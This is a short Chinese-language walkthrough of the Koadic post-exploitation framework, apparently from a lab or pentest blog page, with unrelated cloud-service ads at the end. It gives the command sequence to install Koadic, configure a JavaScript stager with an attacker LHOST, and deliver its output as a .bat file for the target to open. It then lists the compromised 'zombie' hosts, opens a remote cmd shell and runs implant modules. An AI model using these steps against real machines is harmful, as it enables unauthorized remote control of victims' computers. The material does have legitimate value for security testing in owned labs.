標籤:選擇 tps 檔案 disk hub shell set 配置資訊 txt
項目地址:https://github.com/zerosum0x0/koadic
┌─[[email protected]]─[/sch01ar]└──? #git clone https://github.com/zerosum0x0/koadic
下載後開啟並安裝所需的包
┌─[[email protected]]─[/sch01ar/koadic]└──? #pip install -r requirements.txt
安裝完成後啟動程式
┌─[[email protected]]─[/sch01ar/koadic]└──? #./koadic
輸入use和空格然後連按兩下Tab鍵查看模組
stager開頭的模組是用來反彈主機的,implant開頭的模組是用來對反彈的主機進行操作
選擇stager/js/disk進行測試
(koadic: sta/js/mshta)# use stager/js/disk
查看配置資訊
(koadic: sta/js/disk)# info
設定lhost
(koadic: sta/js/disk)# set LHOST 192.168.220.132
然後run
(koadic: sta/js/disk)# run
然後把[>]後的東西寫到一個bat檔案裡,放到目標主機開啟
註:stager開頭的模組都是一樣的操作
得到目標主機的反彈
查看殭屍主機列表
(koadic: sta/js/disk)# zombies
註:此目標主機的ID為0
執行cmd命令,0為主機的ID
(koadic: sta/js/disk)# cmdshell 0
[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami
該上implant模組了
(koadic: sta/js/disk)# use implant/fun/voice
這個MESSAGE隨便你設定,然後run
將會在目標主機朗讀MESSAGE的內容
windows提權協助工具輔助koadic
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
